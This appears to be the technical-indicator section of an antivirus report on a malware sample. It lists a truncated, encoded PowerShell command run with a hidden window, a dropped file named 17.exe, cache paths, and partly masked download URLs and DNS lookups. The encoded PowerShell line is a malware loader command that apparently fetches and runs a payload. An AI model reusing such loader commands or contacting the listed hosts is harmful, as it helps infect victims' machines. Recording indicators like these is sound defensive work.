Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABMAG4AbgBjAGwAdgBpAGgAPQAnAFIAbQBiAGEAYgBsAHoAYgB6AHIAeQBnAGoAJwA7ACQARQB0AG8AbwB2AGUAZgBmAHoAIAA9ACAAJwAxADcAJwA7ACQARwBnAGMAagBpAGkAaAB2AHQAaABhAGwAcwA9ACcATQBzAGkAbgBnAG0AbgB0AHMAZwB...
- %HOMEPATH%\17.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\17.exe
- http://ex####encenano.com/wp-admin/R/
- http://www.ex####encenano.com/2019/07/05/record-633-divers-pick-up-a-ton-of-trash-from-ocean-floor-in-florida/
- DNS ASK ma###olife.com
- DNS ASK ni#####cademypro.com
- DNS ASK ex####encenano.com
- DNS ASK as####ssain.edu.in
- DNS ASK ye###ryek.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABMAG4AbgBjAGwAdgBpAGgAPQAnAFIAbQBiAGEAYgBsAHoAYgB6AHIAeQBnAGoAJwA7ACQARQB0AG8AbwB2AGUAZgBmAHoAIAA9ACAAJwAxADcAJwA7ACQARwBnAGMAagBpAGkAaAB2AHQAaABhAGwAcwA9ACcATQBzAGkAbgBnAG0AbgB0AHMAZwB...' (со скрытым окном)